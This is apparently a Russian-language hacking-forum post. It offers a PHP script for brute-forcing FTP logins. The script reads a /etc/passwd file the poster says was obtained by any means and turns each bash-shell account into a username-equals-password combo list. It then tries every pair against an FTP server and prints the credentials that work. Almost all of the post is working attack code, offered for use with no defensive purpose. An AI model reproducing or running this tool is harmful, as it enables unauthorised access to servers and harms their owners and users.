Описание:
Удаленный перебор пароля к фтп по одинаковому логину и паролю.
Фаил passwd.txt содержит записи вида (/etc/passwd):
root:x:0:0:root:/root:/bin/bash
valence:x:603:608::/home/valence:/bin/bash
distprom:x:604:609::/home/distprom:/bin/bash
Неважно как вы его получили )
Регулярным выражением собераем фаил combo.txt вида:
root:root
mysql:mysql
admin:admin
easyagnt:easyagnt
cpanel:cpanel
mailman:mailman
postgres:postgres
photop:photop
active:active
Сопственно сам скиптик:
<?
$filepass = "./passwd.txt";
$str = file($filepass);
$num = count($str);
for($i=0;$i<$num;$i++)
{
if(ereg("^([[:alnum:]]+):x:[^<>]+bash",$str[$i],$login[]))
{
$lp = $login[$i][1].":".$login[$i][1]."\r\n";
$f = fopen("combo.txt","a+");
fputs($f,$lp);
fclose($f);
}
}
$ip= "192.168.0.1";
$combo_file = "./combo.txt";
set_time_limit(0);
$combo_data = file($combo_file);
$num =count($combo_data);
for($i=0;$i<$num;$i++){
flush();
list($login[$i],$passwd[$i]) = split(':',$combo_data[$i]);
$conn_id = ftp_connect($ip);
if (!$conn_id) {
echo "FTP connection has failed!";
echo "Attempted to connect to $ip";die;
}
else {
echo"Coneccting to".$ip.".............";
if(@ftp_login ($conn_id,$login[$i],$passwd[$i])){
echo"[230]Login: ".$login[$i]." Passwd: ".$login[$i]."<br>";
ftp_close($conn_id);
}
else{
echo"bad.<br>";
}
}
}
if (filesize($combo_file)>0){
$f = fopen($combo_file,"w");
ftruncate($f,0);
fclose($f);
}
?>
Жду коментоф...
БЗыг
БЗыг
Регистрация: 30.10.2006, 14:50Offline Активность: 20.12.2006, 16:29